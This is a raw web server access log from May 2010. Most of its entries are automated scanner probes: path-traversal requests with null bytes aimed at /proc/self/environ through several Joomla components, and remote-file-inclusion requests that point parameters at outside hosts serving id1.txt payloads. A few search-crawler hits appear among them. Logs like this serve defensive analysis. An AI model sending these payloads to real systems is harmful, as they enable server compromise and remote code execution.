114.108.151.149 - - [28/May/2010:02:09:59 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:09:59 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:02:10:08 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:02:10:10 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:10:10 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:10:21 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:10:22 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:10:22 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:10:23 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:11:44 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:11:45 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:11:47 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:11:48 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:11:49 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:11:49 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.226 - - [28/May/2010:02:12:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.226 - - [28/May/2010:02:12:07 -0500] "GET /artwork/mgpyrpz2.JPG HTTP/1.1" 200 19568 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.60.53.122 - - [28/May/2010:02:12:12 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:12:12 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:12:28 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:12:29 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:02:12:35 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:12:35 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:12:53 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:12:54 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:12:54 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:12:55 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.232 - - [28/May/2010:02:13:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.232 - - [28/May/2010:02:13:12 -0500] "GET /artwork/motto-chair-stitch3.jpg HTTP/1.1" 200 30810 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [28/May/2010:02:13:13 -0500] "GET /logs/access_log.1250899200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.78.118.123 - - [28/May/2010:02:13:25 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:13:26 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.194.95 - - [28/May/2010:02:13:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.95 - - [28/May/2010:02:13:29 -0500] "GET /costume/costm28.jpg HTTP/1.1" 404 303 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.60.53.122 - - [28/May/2010:02:13:32 -0500] "GET /logs/access_log.1272067200//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:13:32 -0500] "GET /logs/access_log.1271894400//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:13:46 -0500] "GET /logs/access_log.1272067200//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:13:46 -0500] "GET /logs/access_log.1271894400//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:13:52 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:13:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:14:00 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.55.135.18 - - [28/May/2010:02:14:30 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:14:30 -0500] "GET /logs/access_log.1270598400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:14:30 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:14:30 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.135.18 - - [28/May/2010:02:14:31 -0500] "GET /logs/access_log.1262563200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:14:31 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:14:36 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:14:36 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:14:38 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:14:39 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:02:14:41 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.55.135.18 - - [28/May/2010:02:14:50 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:14:50 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:14:50 -0500] "GET /logs/access_log.1270598400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:14:51 -0500] "GET /logs/access_log.1262563200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:14:54 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:14:54 -0500] "GET /logs/access_log.1270598400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:14:54 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:14:58 -0500] "GET /logs/access_log.1262563200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:15:01 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:15:01 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:02:15:01 -0500] "GET /logs/access_log.1270598400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
67.195.112.180 - - [28/May/2010:02:15:05 -0500] "GET /logs/access_log.1166486400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.37.143.198 - - [28/May/2010:02:15:06 -0500] "GET /logs/access_log.1262563200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:15:12 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.135.18 - - [28/May/2010:02:15:25 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:15:25 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:15:25 -0500] "GET /logs/access_log.1270598400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:15:26 -0500] "GET /logs/access_log.1262563200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
207.46.195.225 - - [28/May/2010:02:15:29 -0500] "GET /logs/access_log.1173571200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:02:15:36 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:15:37 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:15:42 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:15:42 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:16:03 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:46 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:46 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:57 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:58 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:58 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:16:59 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:17:06 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:17:06 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:17:54 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:17:55 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:18:07 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:18:08 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.135.18 - - [28/May/2010:02:19:36 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
67.210.98.160 - - [28/May/2010:02:19:37 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:19:38 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:19:38 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:19:48 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:19:48 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:19:48 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
121.78.118.123 - - [28/May/2010:02:19:49 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:19:50 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.162.206.179 - - [28/May/2010:02:20:00 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
114.108.151.149 - - [28/May/2010:02:20:00 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:20:01 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.162.206.179 - - [28/May/2010:02:20:02 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
204.152.200.50 - - [28/May/2010:02:20:02 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:20:02 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:20:02 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.37.143.198 - - [28/May/2010:02:20:05 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:20:16 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:20:16 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.37.143.198 - - [28/May/2010:02:20:17 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:02:20:33 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:20:38 -0500] "GET /logs/index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:20:38 -0500] "GET /index.php?option=com_a6mambocredits&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
204.152.200.50 - - [28/May/2010:02:21:01 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:21:02 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:21:02 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.210.98.160 - - [28/May/2010:02:21:30 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:21:30 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:21:30 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:02:21:31 -0500] "GET /logs/access_log.1252454400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.17.201.144 - - [28/May/2010:02:21:42 -0500] "GET /logs/index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.17.201.144 - - [28/May/2010:02:21:42 -0500] "GET /index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.210.98.160 - - [28/May/2010:02:21:47 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:21:47 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:21:47 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
121.78.118.123 - - [28/May/2010:02:22:06 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:22:07 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:22:24 -0500] "GET /logs/access_log.1232668800/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:22:25 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:22:25 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
204.152.200.50 - - [28/May/2010:02:23:22 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:02:23:26 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:23:51 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
121.78.118.123 - - [28/May/2010:02:24:18 -0500] "GET /logs/access_log.1271548800/SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:24:18 -0500] "GET /logs/SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:24:18 -0500] "GET /SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:25:14 -0500] "GET /SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
